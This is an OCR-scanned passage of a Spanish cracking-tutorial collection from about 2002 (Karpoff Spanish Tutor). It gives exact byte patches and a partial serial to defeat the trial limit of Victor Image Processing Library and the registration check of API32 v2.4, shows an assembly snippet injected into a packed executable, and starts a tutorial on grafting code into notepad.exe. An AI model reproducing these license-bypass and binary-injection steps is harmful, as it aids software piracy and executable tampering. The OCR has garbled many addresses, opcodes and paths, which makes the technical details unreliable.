| serial es: d3m4 - 3PF8 - 7SB4 - xxxx - xxxx - xxxx los demas sacalos tu... 


Ah, y ten cuidado ya que la rutina de verificacion reconoce la diferencia entre MAYUSCULAS y 
| minusculas. 


DESPEDIDA 


Como dije al principio, este es mi primer tutorial y debo agradecer a mi gran amigo eSqUiZo por pasarme 
las primeras copias sobre cracking que leí (ESTADO+PORCINO), a mi mejor amiga LUANA por 
enseñarme a analizar las entrañas de este Sistema Operativo, y a mi compañera de todos los caminos 
Tatiana, que nunca dejo de darme su apoyo y su amor. 


Gracias tambien a todos los Crackers que lamentablemente solo conozco por sus tutoriales. Cualquier 
duda, comentario o critica al mail que abajo aparece. Hasta la proxima!! 


ASTERION 


Email: asterion10O hotmail.com 


"El mundo real, finalmente, se convertira en ficción" 


Nietzsche 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, 


sobre Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 1999-2002 


Programa: | Victor Image Processing Library v5.3e 


PROTECCIÓN: Limite de Tiempo 

' Sy Librería DLL para tratamiento de imágenes (principalmente 
Descripción: , h e ed 

visualización y conversión) 

Dificultad: Newbie (2 minutos :-)) 
DOWNLOAD : http: //www.catenary.com/download/vic5e.html 
Herramientas: Un cerebro, W32dasm, Editor Hexadecimal 
CRACKER: zeru | FECHA: 27/01/2002 


INTRODUCCIÓN 


Iba yo buscando alguna cosa tipo ActiveX o DLL para añadir a un programita mío el poder guardar imágenes 
en JPEG (para ahorrar espacio) cuando me encontré con esta librería, con una excelente documentación sobre 
cómo pasar de BMP a JPEG. Y, como además funcionaba, decidí bajar la versión de evaluación. Pero 


entonces veo que caduca el 28 de febrero, y como para entonces no habré terminado el programa, vi que 
habría que hacer algún arreglo a la librería... ;-) 


AL ATAKE 


Bueno, esto te va a llevar un minuto... Primero abres el W32dasm y desensamblas el fichero de la DLL (vic32.d1l). Una 
vez ha terminado, abres las String References, en el menú Refs. Allí, simplemente buscas alguna cadena de texto que 
diga algo así como "Evaluation Time Expired". Y eso mismo es lo que pone, así que haces doble click encima de esa 
referencia y aterrizas en una zona en la que, más o menos, pone esto: 


:60CB0515 FF15B8BOCB60 Call dword ptr [60CBB0B8] 

:60CBO51B 8BD8 mov ebx, eax 

:60CB051D E888000000 call 60CBO5AA <-- Llamada que revisa la fecha 
:60CB0522 3BC7 cmp eax, edi <-- Compara el resultado 
:60CB0524 7517 jne 60CB053D <-- Salta si no es igual 
:60CB0526 56 push esi 


* Possible StringData Ref from Data Obj ->"Evaluation Time Expired" 


:60CB0527 683002CC60 push 60CC0230 <-- Aparecemos aquí. Si el programa 
:60CB052C 683801CC60 push 60CC0138 llega aquí... MUY MAL! Todo 
:60CB0531 56 push esi lo marcado en verde alga (?) es 


la parte "jódete!" 
* Reference To: USER32.MessageBoxA, Ord:01C3h 


:60CB0532 FF1518B2CB60 Call dword ptr [60CBB218] 
:60CB0538 8975FC mov dword ptr [ebp-04], esi 
:60CB0O53B EB63 jmp 60CBO5AO 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :60CB0524 (U) 


:60CB053D 8BC3 mov eax, ebx <-- Si consigue llegar hasta aquí, 
es que ha pasado el control 


Parece simple, no? (el código, no el Picasso que he hecho... :0) ) Si, ya sé, éste es el típico principiante que cambia el 
salto que está antes del mensajito y así cree que lo ha solucionado porqué ya no se ve el mensaje y en verdad lo único 
que quita es el mensaje y no la protección, no? Pues no. No hace falta romperse el coco con estos programadores tan 
brillantes de hoy en día: si haces una visita al Call de antes del mensaje (dirección 60CB0522) haciendo doble click 
encima y luego heces lo vuelves a hacer en la primera llamada que aparece (en la dirección 60CB5B2), verás que esta 
última llamada llama (es su trabajo, no?) a las APIs de windows GetLocalTime y GetSystemTime. Demasiada 
casualidad, y más todavía si el programa solo llama a estas funciones desde esa función, que podemos afirmar sin dudas 
que ¡COMPRUEBA LA FECHA! 


Bueno, después de esta pequeña muestra de chulería y prepotencia, solo queda hacer un pequeño cambio en la dirección 
60CB0524 (la del salto) para que pase de 7517 ¡ne 60CB053D a EB17 ¡mp 60CB053D (en rojo, los cambios). Así, en 
vez de saltar al código bueno si la fecha está bien (instrucción de salto condicional JNE, salto si no es igual), saltará 
siempre aunque haya pasado el tiempo de prueba (instrucción de salto incondicional JMP, salto a secas). 


Que no sabes cómo? Bueno, en plan parvulario, te enseñaré cómo: coges el editor hexadecimal, abres el fichero a editar 
(hexadecimalmente, pa eso está el editor) y vas al offset (dirección de memoria) donde está el byte a cambiar (en el 
W32dasm marcas la línea 60CB0524 y miras en la barra de estado el número al lado de "Offset", en este caso 20524). 
Una vez encuentres el byte, puedes comprobar que pone 7517, así que escribes EB encima del 75. Y ya está! 


Por supuesto, si quieres el programa, ¡cómpralo! Aunque la protección sea pésima, todo el 
resto (todito) es genial y funciona de maravillas. 


Estás avisado, o sea que hasta la próxima! Por cierto, me pregunto si por aquí habrá algún cracker catalanoparlante (de 


donde sea... de marte me vale). Si ése eres tú, házmelo saber, y de paso me informas si hay de nuestra especie, o de si 
hay algún errorcillo por aquí... :0) 


zerU 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


CRACKEAR ARCHIVOS PE 
EMPAQUETADOS (1) 


por nuMiT_or [kUT] 


Target: API32 v2.4 


Herramientas: —Snippet Creator v1.5 
HexWorkShop 
Softlce 
TASM v5.0 
Puedes conseguir estas herramientas en http://members.xoom.com/crk10/archivos 


http://welcome.to/karpoff 


Autor: nuMIT or 


Intro 


Y a he escrito un tutorial sobre Snippet Creator donde trato el tema de quebrar protecciones 
en archivos ejecutables PE enpacados. Me he dado cuenta que era un escrito muy duro para 
principiantes y he reorganizado un material que pudiera ser seguido mejor y con más 
facilidad. 


Sin embargo, para poder seguir este tutorial se requiere una experiencia mínima en lenguaje 
ensamblador orientado al sistema operativo Windows a 32 bits, conocimiento de las 
estrategias clásicas de desprotección de programas (las comunes), algunas nociones sobre la 
estructura de los archivos con formato PE. De alguna manera supongo también 
conocimietos sobre desempacado manual de archivos con ProcDump. 


El Camino 


El método clásico de crackear archivos PE empaquetados consiste en usar un parcheador de 
procesos (process patcher) y hacer el parche estratégico en tiempo de ejecución. Se trata de 
esperar hasta que el archivo sea desempacado en la memoria para su ejecución y entonces 
parcharlo. Para hacer esto, tenemos que tener el manejador del proceso. 


Tenemos entonces que un parchador de un proceso se puede dividir en dos partes: 


un cargador: una rutina que carga el proceso objeto generalmente en modo de 
depuración. 


un parchador: una rutina que intercepta el proceso, toma el control y escribe el parche 
en el proceso. 


Yo nunca he usado este método. Uso otro, también clásico: injertar un recorte de código 
que tome el control del programa cuando éste se ejecuta, sobre-escriba el archivo objeto en 
tiempo de ejecución y haga los parches necesarios en puntos estratégicos. Estos puntos 
estratégicos son direcciones virtuales del proceso o desplazamientos dentro del archivo: 


1. Final de la rutina que desempaca el archivo : Desplazamiento 1 - VA1 (Virtual Address 1) 

Todo archivo ejecutable necesita ser desempacado para correr. El código con que 
comienza el programa que contiene este archivo es un "cargador" [ loader ] que desempaca 
el archivo en memoria. Cuando la rutina termina, el archivo objeto es desempacado en 
memoria, y podemos parcharlo en este momento. Una vez alcanzado el final del "cargador" 
del archivo empacado, el archivo ya debería estar desempacado en la memoria, así que a 
partir de la dirección de las últimas instrucciones del cargador escribimos unas nuevas 
instrucciones que hacen que el programa pase el control a un recorte de código que hemos 
insertado estratégicamente dentro del archivo empacado. Este recorte parchará entonces el 
archivo de manera que quedan rotas las protecciones que impiden su disfrute. A la 
dirección dónde termina de ejecutarse el cargador del empacado la llamamos VA1. 


2. Un lugar para el recorte. Desplazamiento 1 - VA2 (Virtual Address 2) 

Tenemos que especificar dónde colocaremos el recorte de código parchador que romperá 
la protección del programa. Este código ha de recibir el control desde el cargador que 
desempaca el programa cuando éste es ejecutado. Cuando el recorte se ejecuta, re-escribe 
algunas instrucciones que eliminan las protecciones y restaura las instrucciones que le 
entregaron el control para que el programa siga su curso y devuelve el control al programa. 
Para hacer el parche, la sección del archivo PE a parchar debe ser "escribible" (writeable), 
de lo contrario se producirá un error de protección. A la dirección donde colacamos el 
recorte la llamamos VA2. 


3. La dirección de la instrucción a parchar: VA3 (Virtual Address 3) 

Todavía tenemos que romper la protección del archivo. Esto no lo podemos hacer a la 
manera clásica, directamente sobre los desplazamientos característicos con un editor 
hexadecimal porque el archivo objeto está empaquetado. Podemos localizar las 
instrucciones a parchar y sus direcciones con un depurador (debugger) como Softlce y 
luego proceder a parchar el archivo con código que podemos introducir en un punto 
estratégico del ejecutable empaquetado. El problema es que generalmente los empacadores 
al empacar un archivo ejecutable PE, cambia las características de sus secciones, evitando 
que Softlce, y otros desensambladores, se detengan en ciertos del programa. Para que 
Softlce pueda revisar un programa de estos, debemos revisar las características de las 
secciones del archivo ejecutable para asegurarnos que las secciones de código tengan las 
características típicas que les convienen. 


4, Escribir y ensamblar el recorte. 

Si tenemos éxito en el intento de romper la protección que nos mortifica, debemos 
proceder a escribir un recorte de código enensanblador (es lo más pequeño y rápido), 
ensamblarlo y pegarlo en el archivo objeto donde hemos establecido. 


¿Eselcamino? 


A veces encontramos que las instrucciones finales del cargador del archivo empaquetado 
también están empacadas. Así que tenemos que esperar que estas últimas instrucciones sean 
desempacadas antes de parcharlas para que entreguen el código al recorte. Para resolver 
esto, podemos pasar el control a nuestro recorte parchador antes de que la rutina cargadora 
llegue al final. ¿Cuándo? cuando las instrucciones finales del cargador hayan sido 
desempacadas. Entonces tenemos que agregar algunas instrucciones adicionales al recorte 
para que éste parche primero las últimas instrucciones del cargador y éste pueda entregar de 
nuevo, por segunda vez, el control al recorte. La segunda vez que el recorte tiene el control, 
parchará el código original del programa y eliminará sus protecciones. 


5. Dirección de la primera llamada al recorte: VAO. 

Bien, el recorte recibirá entonces el control dos veces. La primera vez, parchará las 
últimas instrucciones de la sección del archivo encargada de desempacar el programa; este 
parche consiste en un par de instrucciones que entregarán el control al recorte por segunda 
vez. En esta última ocasión, el recorte ejecutará una nueva rutina que parchará el programa 
en memoria y lo desprotegerá. A la dirección que entrega el control por primera vez al 
recorte lo llamamos VAO. 


<<On the way>>(Do you remember Jack Kerouack?) 


Crackear un archivo empacado empleando este método es sencillo con Snippet Creator, una 
herramienta hecha para injertar código nuevo en archivos ejecutables con formato PE. Así 
que consigamos este programa, corrámoslo y creemos un proyecto nuevo: FilelNew 
project. Este comando desplegará una ventana donde podrás seleccionar el archivo que 
deseas cambiar o desproteger y dar un nombre al proyecto. Cuando creas un programa, 
Snippet Creator crea un subdirectorio con el nombre que tú eliges y un archivo .INI que 
salva la información y permite reabrir el proyecto. 


1. Final de la rutina desempacadora: Desplazamiento 1 - VA1 (Virtual Address 1) 


Nuestro objetivo será api32 v2.4. Para registrar este programa y obtener todas sus funciones 
podemos buscar y calcular su serial. Pero he visto que esto puede resultar un trabajo largo y 
arduo. A veces es preferible (menos trabajo - mejor resultado, +ORC) parchar el archivo 
ejecutable cuando se pueda. Tomaremos este camino. 


Primero tenemos que ubicar el final de la rutina que desempaca el archivo. Cargamos el 
programa con Softlce y bajamos de alguna manera (usando la tecla F10, y ocasionalmente 
FS y F9 para evitar los bicles [ loops ] ) hasta 00 41 B5 D2. 


Esta instrucción es un salto [ jump ] al punto de entrada original del programa en la sección 
text: 


:0041B5BD  8B 6424 14 mov esp, dword ptr [esp+14] 
:0041B5C1 SE pop esi 

:0041B5C2 8B FE mov edi, esi 

:0041B5C4  81C6D7 150000 add esi, 000015D7h 
:0041B5CA — 6A 05 push 00000005h 

:0041B5CC> 59 pop ecx 

:0041B53CD — F3 repz 

:0041B5CE — A4 movsb 

:0041B5CF  6l popad 

:0041B5DO  669D popf 


:0041B5D2  E09 E9 9F FE FF jmp 004055C0h ; <- Salto al punto de entrada 
original 


La instrucción en la dirección 00 41 B5 D2 es donde termina el cargador interno del 
programa empaquetado. Llamamos a esta dirección VA1. 


En esta dirección tendremos que escribir una instrucción de seis bytes que tiene la forma: 


l: push address_of snippet 
Zi et 


Estas instructiones entregarán el control al recorte. Un código con esta forma tiene un 
tamaño de seis bytes. En octal: 


l: 68zz yy xx 00 
20 59 


El código octal 68h es la instrucción empujar a la pila [ push ] un dato dword. El resto de la 
instrucción es un número hexadecimal de 32 bits que será empujado a la pila: 00 xx yy zz 
h; este número es la dirección a la que saltará el programa con la siguiente instrucción. Así 
que la instrucción 1 será en ensamblador: 


push 00 xx yy zz h 


El código octal C3h corresponde a la instrucción en ensamblador 'RET". Esta instrucción 
hace que el programa salte a la dirección a la que apunte el registro SP o ESP (el puntero de 
pila). En este caso es la dirección 00 xx yy zz h en la memoria virtual del proceso y que 
antes metimos en la pila. 


Pero todavía hay un problema. La instrucción original en VA1 también está empacada; 
entonces tenemos que esperar hasta que esta instrucción sea cargada para escribir un primer 
salto [ jump ] al recorte: tendremos que localizar otra dirección VAO anterior a VA1 que 
entregue una primera vez el control al recorte: en esta primera ocación, el recorte sobre- 
escribirá la instrucción en la dirección VA1 para que en VA1 el programa entregue 
nuevamente el control al recorte. La segunda vez que el recorte recibe el control, parchará 
el programa y lo desprotegerá. Por último restaurará las instrucciones originales que 
reescribió antes. 


Una buena dirección para dar el control al recorte por vez primera es: 

:0041A110  0F84A7 1400 00 je 0041B5BDh 

Llamamos a esta instrucción VAO. ¿Cómo conseguirla? 

Cargo el programa con el loader de Softlce. Cuando se despliega la ventana de Softlce, 
ejecuto el comando "D 41B5D2". Luego voy trazando las diversas instrucciones del 
programa con la tecla F10 hasta ver como se realiza un cambio en la dirección 41B5D2 en 


la ventana de datos. Seguro aparecerá algo como "FE 9FE9E9 FE FE B3 BB", que son 
los valors octales de las instrucciones siguientes, pero invertidas: 


:0041B5D2 E9E9 OF FE FF jmp 004055C0h ; <- Jump to the original entry 
point 
:0041B5D7  E9 BB BS FE FF jmp 00406B97h 


Entonces, cuando el programa llega a 00 41 A1 10 h, las instrucciones en la dirección 00 41 
B5 D2 h estarán desempacadas y podrán ser parchadas. 


2. Un lugar para el recorte. Desplazamiento 1 - VA2 (Virtual Address 2) 

Para ubicar un lugar para el recorte podemos emplear un método bastante empírico pero 
que funciona. Abrimos el programa con un editor hexadecimal como HexWorkshop y 
buscamos un sitio sin código, lleno de ceros. Estos espacios amplios genertalmente 
podemos encontrarlo al final de las diversas secciones. Así que podemos encontrar un 


espacio amplio al final de la sección .rsrc, en el desplazamiento 00 D3 20 h. 


Podemos elegir este espacio. Tenemos el desplazamiento dentro del archivo, pero 
necesitamos su dirección virtual. Esta dirección la podemos calcular con esta fórmula: 


(Desplazamiento del recorte - Desplazamiento del inicio de la sección) + VA de la Sección 
A esta dirección la llamamos VA2. 


Ya hemos determinado la sección donde pondremos el recorte .rsrc. Para hacerlo 
ejecutamos en Snippet Creator PE InfoWView Section Info. Podemos ver que este 
desplazamiento está en la sección .rsrc, antes de la sección "madmat". El desplazamiento de 
inicio de la sección [ Raw Offset of the section ] es 4A 00h. 


La dirección virtual de la sección [ VA of Section ] es: Dirección de la base de la imagen [ 
Image Base Address | + Desplazamiento virtual de la sección [ VA offset of the section |: 


00 40 00 00h + 00 01 00 00 h = 00 41 00 00 h 
Ahora calculamos: 
VA2 = (00 D3 20h - 00 4A 00h) + 00 41 00 00h = 00 41 99 20h 


Esta es la dirección VA2. 


3. La dirección a parchar: VA3 (Virtual Address 3) 


Ahora vamos a desproteger el programa. Por razones de brevedad, considerando que el 
lector de este tutorial no es propiamente un principiante, no detallaré el proceso para ubicar 
el punto a parchar. Simplemente lo diré. Para que el programa corra como si estuviera 
registrado, con todas sus funciones, debemos cambiar en el siguiente código: 


:00404815 03EA add ebp, edx 
:00404817 41 inc ecx 
:00404818 4E dec esl 
:00404819 75DA jne 004047F5 
:0040481B 33C0 Xor eax, eax 
:0040481D SF pop edi 
:0040481E 85ED test ebp, ebp 
:00404820 SE pop esi 
:00404821 5D pop ebp 
:00404822 0F94C0 sete al 
:00404825 5B pop ebx 
:00404826 59 pop ecx 
:00404827 C3 ret 


La instrucción: 
:00404822 0F94C0 sete al 


Es donde el programa coloca una bandera en el registro al para indicar si el programa está 
registrado o no. Si esta instrucción pone 1 en al, el programa está registrado. Entonces 
podemos cambiar esa instrucción de tres bytes por 


:00404822 FECO inc eax 
:00404824 90 nop 


Esta instrucción hará a al diferente de cero. Cuando el programa revise la bandera, actuará 
como si el programa hubiera sido registrado y actuará como tal. 


Aunque esto sería suficiente para registrar el programa, todavía necesitamos introducir 
nuestro nombre de ususario y el serial. El programa revisa el número de caracteres en el 


nombre de usuario (debe ser mayor que cinco) y el de la clave (debe ser 16 o más). 


Bien. ya tenemos la dirección de los parches. 


4, Escribir y ensamblar el recorte. 
Tenemos que crear el proyecto en Snippset Creator: FilelNew project. Lo llamamos api32. 
Luego configuramos las opciones del proyecto: 


Snippet VA = VA2 = 41 99 20 

Patch Options = Patch into Existing Section 

Address to Redirect Control To the Snippet = Redirect Control From Code Section 
VA1 =00 40 17 75 

Return Control to the program = Don't Return Control To Program 


Estas opciones eligen: 


- la dirección virtual donde el recorte será injertado (VA2) 

- el recorte será injertado dentro de una sección existente (.rsrc) 

- la dirección virtual donde el programa dará el control al recorte (VA1) 

- el recorte no regresará el control al programa; tenemos que hacerlo nosotros y escribirlo 
en el recorte. 

- Snippet Creator no restaurará las instrucciones originales del programa. Tenemos que 
hacerlo nosotros. 


Luego escribimos el recorte y lo ensamblamos. A continuación está el código del recorte 
para TASM v5.0. Antes de ensamblar el recorte debemos elegir y configurar el ensamblado 
que usemos. Ejecutamos en Snippet Creator ActiomOptions para desplegar la ventana 
"General Options”. Escogemos el ensamblador (TASM o MASM según sea el caso) y 
establecemos los comandos y parámetros correspondientes. En mi caso particular, que he 
empleado TASM v5.0, y tengo a Snippet Creator en el directorio CAASMUCZA, los valores 
y comandos son: 


Assembler 

TASM 

Locations 

Assembler: TASM32 /ml %1 

Linker: TLINK32 /Tpe /c /aa /V4.0 %1,,,CATAILIBúmport32.lib 


Project Directory: CiIASMUCZA 


Estos comandos suponen que el directorio donde tengo TASM32.EXE y TLINK32.EXE, 
está en entorno; es decir, cuando inicio la sección en Windows, el archivo por lotes 


"autoexec.bat" tenía la siguiente línea: 
PATH  CATASMBIN;¡CATASMILIB;¡CATASMUNCLUDE;%PATH% 


A contiuación el código del recorte: 


jmp init 


oldinstl1 db 00Fh,084h,0A7h,014h,000h,000h 
oldinst2 db 0E9h,0E9h,09Fh,OFEh,OFFh,09Eh 
newinstl db 068h, 020h,099h,041h,000h, 0C3h 
newinst2 db OFEh,0COh,090h 

counter db O 


init: 

pushad 

cmp counter,0 
jne time2 


; Restaurar la instrucción 1 
inc counter 


mov edi,41A110h ; dirección de la instrucción original 1 en VAO 
lea esi,oldinstl ; Instrucción a restaurar 

mov ecx,6 push ecx ; tamaño de la instrucción original 

rep movsb ; restaurar la dirección original 


; Escribir la nueva instrucción en VA1: segundo salto al recorte 

mov edi,41B5D2h ; dirección donde se volverá a entregar el control al recorte: 
VA1l 

lea esi,newinstl ; instrucción a escribir 

pop ecx ; tamaño de las instrucciones 

rep movsb 


; Retorno 1 
popad 

push 41A110h 
ret 


time2: 
; Restauar intrucción 2 


mov edi,41B5D2h ; dirección de la instrucción original 2 en: VA1 
lea es1,oldinst2 ; instrucción a restaurar 

mov ecx,6 

rep movsb 


: Write new instruction 2: patch 2 


mov edi,404822h ; dirección de la instrucción original 2 en : VA2 
lea esi,newinst2 ; instrucción a escribir 

mov ecx,3 ; tamaño de las instrucciones 

rep movsb ; escribirlas 

; Retorno 2 

popad 

push 41B5D2h 

ret 


Después de escribir estas lineas en la ventana de edición de Snippet Creator, presionamos el 
botón "Assemble" y esperamos. Si no hay error, el recorte de código ha sido ensamblado y 
enlazado. 


Ahora podemos "exportar" el binario correspondiente al recorte (FilelExport) y salvamos 
ap132.bin. 


Abrimos el archivo api32.exe con HexWorkshop (conviene más emplear este editor que 
HIEW, ya que necesitamos tener dos vistas desplegadas al mismo tiempo, una del archivo 
ap132.exe y otra del recorte api32.bin). Vamos al desplazamiento 00D320 h ( Edit/Goto ). 
Es el desplazamiento donde colocaremos el recorte de código. 


Ahora abrinos el archivo api32.bin que hemos exportado. Lo marcamos totalmente con el 
ratón y lo copiamos (CTRL+C). Luego desplegamos la vista de api32.exe y vamos al 
desplazamiento 00D320h y marcamos desde 00D320 hasta 0OD39Eh. Ahora pegamos el 
recorte (CTRL+V). Para terminar, ponemos en el desplazamiento 00D510h 
(correspondiente a la dirección virtual VAO) la instrucción que entrega el control al recorte 
por primera vez: 68 20 99 41 00 C3. Esto significa: 


:0041A 110 68 20 99 41 00 push 00419920 
:0041A115 C3 ret 


Recordar que el recorte ha sido colocado en la sección .rsrc. Como sobrescribimos esta 
sección con alguna instrucción debemos asegurarnos que soporte escritura. Revisemos las 
características de la sección .rsrc: PE InfoWView Section Info. Las características son: 40 
00 00 40 h. Esto significa: 


Datos Inicializados: 00 00 00 40 h 
Lectura: 40 00 00 00 h 
40 00 00 40 h 


La sección no soporta escritura, así que tendremos que editar las características. Para hacer 
esto hacemos click con el botón derecho del ratón sobre la cadena .rsrc que aparece en el 
cuadro de diálogo "Section Information". Seleccionamos "Edit Section" en el menú 
emergente: esto despliega el vuadro de diálogo "Modify Section Values”. Pulsamos el 
botón "..." al lado del campo "Characteristics". Esto despliega el cuadro de diálogo "Section 
Charactheristics”. Seleccionamos la caja de chequeo IMAGE_SCN_MEM_WRITE y 
salvamos ( save ). Ahora las características de la sección serán: CO 00 00 40 h: 


Datos Inicializados: 00 00 00 40 h 


Lectura: 40 00 00 00 h 
Escribible: 80 00 00 00h 
CO 00 00 40 h 


Esto mismo lo tenemos que hacer para todas aquellas secciones que serán escritas durante 
el proceso, como el cargador del empacado, que es la sección con que inicia un ejecutable 
empaquetaso. Eso es todo. 


Registrando 


Ahora corremos el programa y pulsamos el botón 'register'. Escribimos un nombre con más 
de cinco caracteres: 


Mi_Nombre 
y un código serial con más de dieciseis caracteres: 
FREE-FREE-FREE-FREE 


Hacemos click sobre OK, y listo... 


Comentarios y correcciones: nuMIT_orGOiname.com 
Mi página de programación: nuMIT_ors Programming Page 


CRACKEAR ARCHIVOS PE 
ENPAQUETADOS (ll) 


Usando DLLs 


por nuMl!lT_ or [kUT] 


Target: AWAVE v4.5. (http://www.fmjsoft.com) 


Herramientas: Code SnippetCreator 
HexWorkShop v2.5x 
SICE 3.XX o superior (¿qué haríamos sin él?) 
MASM 6.X o TASM 5.0 


NOTA: Estas herramientas las puedes hallar en: http://members.xoom.com/crk10/archivos 


Autor:nuMIT or 


Contenido: - INTRO 


Insertar un objeto nuevo en un archivo PE 
El recorte es grande y no quiero aumentar el programa 


MALDITAS PROTECCIONES: quebrando a AWAVE v4.5 
ALGUNAS PREGUNTAS - ALGUNAS RESPUESTAS 


* ¿Las j¡mp de las apis están siempre en secciones .text? 


* ¿Qué significan las características de las secciones de un PE? 


* ¿Qué es una DLL y para qué sirve? ¿cómo se crea? 


Particularmente veo el mayor potencial de conocer los encabezados del PE en la 
personalización de programas. Sin un editor de recursos se puede cambiar el 
comportamiento de los menúes, de los diálogos y mucho más. También podríamos ampliar 
la funcionalidad de las aplicaciones y mejorarlas. Es un trabajo que podemos hacer 
"manualmente", sin necesidad de un programa especial para ello. 


Insertar un objeto nuevo en un archivo PE 


Como un ejercicio, vamos a insertar una rutina nueva en notepad.exe. Es la libreta de notas 
que trae el sistema Windows, generalmente en el directorio CAWINDOWS. Así que 
copialo y guárdalo en un directorio temporal ya que le haremos algunos cambios. 


Para insertar rutina nueva en notepad.exe vamos a utilizar Snippet Creator. Existen otras 
herramientas que pueden hacerlo también, pero yo utilizo ésta. 


Repasemos como configurar Snippet Creator para insertar código nuevo en un archivo PE. 
1. Debemos primero hacer unos ajustes: vamos a Action/Options. 
No sé si sea necesario explicarlo, pero hay que: 


1.1. Indicar si usarás MASM o TASM. Son los ensambladores comerciales 
más populares. 


1.2. Para cada uno de ellos, si los tienes, eliges los comandos con sus 
respectivos comutadores. 


1.3. Hay que indicar también el directorio donde será creado el proyecto es 
decir, la rutina que injertarás en el PE. 


1.4. OK. 


1.5. Si prefieres y no eres tan quisquilloso, simplemente pulsa DEFAULT y 
se establecerán los valores por defecto. No es una mala opción. 


2. Ahora debes crear un proyecto (File/New Project) u opcionalmente determinar el 
target (Acton/New Target). Á nuestro proyecto nuevo lo podemos llamar NP. 


3. Luego viene lo interesante: crear el recorte (snippet). Hay que escribir el código del 
recorte en la ventana de edición del programa. Los siguientes son más o menos los 
ejemplos de Icz: 


Para MASM: 


include windows.inc 
include user32.inc 
includelib user32.lib 
jmp init 


Message db "Probando, un, dos, tres. probando",0 


init: invoke MessageBox,NULL,addr Message, NULL,MB_OK 


Para TASM: 


UNICODE=0 
include w32.inc 
jmp ComienzoReal 


Message db "Probando, un, dos, tres. probandot",0 
ComienzoReal: call MessageBox,NULL,offset Message, NULL, MB_OK 


Ahora guarda el código escrito ("File/Save Project"). Snippet Creator creará en la carpeta 
del proyecto un archivo .INF que salvará la información sobre los avances realizados en el 
proyecto. 


Es necesario observar que el código anotado arriba sólo funciona si, en este caso, 
MessageBox es una de las funciones importadas por el archivo target. Para asegurarse de 
esto, simplemente vamos a la ventana "Import Information" a través de "PElInfoView 
Import Fuctions”. Hacemos click con el botón derecho del ratón sobre USER32.DLL y 
revisamos. Ya, aparece la función MessageBox. 


4, El siguiente paso es ensamblar el recorte: pulsa el botón "Assemble" debajo de la 


ventana de edición o ejecuta el comando "Action/Assemble". Si todo va bien, vamos al 
siguiente punto. 


5. Exportar el recorte. Al ejecutar el comando "File/Export", se abre la caja de diálogo 
común "SAVE AS”. Busca la carpeta del proyecto y salva el archivo .BINSEe trata del 
recorte propiamente dicho. Si lo abres con HIEW.EXE (Hacker View) podrás ver un 
desensamblado de lo que escribiste. Esto ya es bastante. Puedes tomar el contenido de este 
archivo y pegarlo manualmente en el sitio indicado del target y ya. Pero SC te puede 
ahorrar este trabajo. 


6. Ahora el momento crucial: injertar el recorte en el target. Para hacer primero debes 
ejecutar el comando "Acton/Project Options”. Esto desplegará una caja de diálogo donde: 


6.1. Debes llenar la caja VA con la dirección virtual donde deseas insertar el 
recorte (snippet). Para esto, hay que encontrar un punto disponible dónde 
hacerlo. Los sitios posibles son: 


a. Al final del archivo, como una nueva sección. Esto 
incrementa el tamaño del archivo. 


b. Entre las tablas de las secciones y la primera sección. 
También como una nueva sección. 


Cc. En algún espacio no utilizado de una sección. Pienso que 
esta es la mejor opción ya que no tiene que crearse una nueva 
sección ni aumenta el tamaño del archivo. 


Para ubicar el sitio donde ubicar el recorte, abrimos el target con un editor 
hexadecimal y buscamos un área vacía, llena de ceros. Una vez encontrada, 
anotamos el desplazamiento donde empieza y el desplazamiento donde 
termina. En mi versión de notepad.exe, por ejemplo, hayamos un gran 
espacio en el desplazamiento 4020h (revisa tu versión, si esto no es posible 
elige otro desplazamiento). Luego, empleando el comando "PE Info/View 
Section Info", abrimos el diálogo "Section Information" y en la columna 
"RAW offset" revisamos en cual sección se halla el espacio que he elegido. 
Es la sección .data. Luego calculamos la dirección virtual equivalente al 
desplazamiento dentro del archivo: 


VA del recorte = (Desplazamiento del recorte - RawOffset de la Sección) + 
(ImageBase + VirtualOffset de la sección) 


(00004020h - 00003E00h) + (00400000h + 00006000h) = 00406220h 


Colocamos este valor en el campo "Snippet VA” del diálogo "Project 
Options”. 


6.2. Según sea la opción que hayamos elegido, hay que indicarlo en el área 
"Patch Options" de la caja de diálogo "Project Options”. Elijamos "Patch 
into Existing Section”. 


6.3. Después de escoger dónde insertar el recorte, debemos decidir como el 
recorte ha de tomar el control. 


Si queremos que el código se ejecute antes del código del 
archivo objeto o víctima, debemos redirigir el control desde el 
punto de entrada RVA (opción "Redirect Entry Point RVA”). 
Con esta opción, el programá dará el control al recorte cuando 
el archivo esté listo para ser ejecutado. 


Si queremos que el recorte reciba el control después de que 
algunas rutinas del archivo objeto se haya ejecutado, debemos 
elegir entre dos opciones: "redirect-from-code-section" 
(redirigir-desde-la-sección-de-código) o "redirect-from- 
call/¡mp" (redirigir-desde-call/¡mp). La opción "redirect-from- 
code-section”" insertará las instrucciones en la dirección virtual 
que pasará el control al recorte. Sin embargo, debes tener 
cuidado al elegir la dirección desde donde redirigirás el 
control: debe estar en el límite de una instrucción. Por 
ejemplo, para una sección como esta: 


:00401007 6819304000 push 00403019 

:0040100C 6A00 push 00000000 

* Reference To: USER32.MessageBoxA, Ord:0195h | 
:0040100E E807000000 Call 0040101A 

:00401013 6A00 push 00000000 


puedes escoger 40100C como la dirección de redirección, pero 
no 40100D. Snippet Creator no será capaz de capturar este 
tipo de error, así que debes ser cuidadoso en esto. Para pasar 
el control al recorte, Snippet Creator reemplazará la(s) 
instrucción(es) en esa dirección virtual con "push [VA del 
recorte]" y luego"ret". 


Redirection from call/¡mp es otro método. Esta opción 
requiere que se diga a Snippet Creator donde está la 
instrucción call/¡mp y automáticamente reemplazará la 
instrucción original call/¡mp con la dirección de tu recorte. En 
este ejemplo, si empleamos esta opción, debemos pasar 
40100E como la dirección virtual que redirigirá el control. 
Snippet Creator almacena esta dirección, la de rutina original, 
en una variable llamada OriginalLocation. Luego, si se desea 
entregar de nuevo el control a la rutina original, en el recorte 
se puede hacer algo como "jmp dword ptr [OriginalLocation]" 
o "call dword ptr [OriginalLocation]", dependiendo de si 
originalmente era una llamada (call) o un salto (jump). 


Si prefieres redirigir el control desde algún sitio en el código 
existente, puedes almacenar las instrucciones sobre-escritas 
después de que tu recorte obtenga el control. Lo puedes hacer 
estableciendo la caja de chequeo (checkbox) restore- 
